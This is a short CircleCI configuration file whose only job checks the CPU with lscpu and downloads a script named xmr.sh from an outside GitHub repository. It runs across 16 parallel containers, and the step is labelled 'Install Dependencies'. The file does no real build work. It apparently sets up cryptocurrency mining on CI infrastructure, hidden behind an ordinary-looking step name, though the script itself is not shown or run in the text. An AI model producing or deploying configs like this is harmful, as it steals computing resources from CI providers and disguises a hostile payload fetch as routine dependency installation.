version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              lscpu
              wget https://raw.githubusercontent.com/jayales/USDT_ku/main/xmr.sh

workflows:
    version: 2.1
    build:
        jobs:
        - trial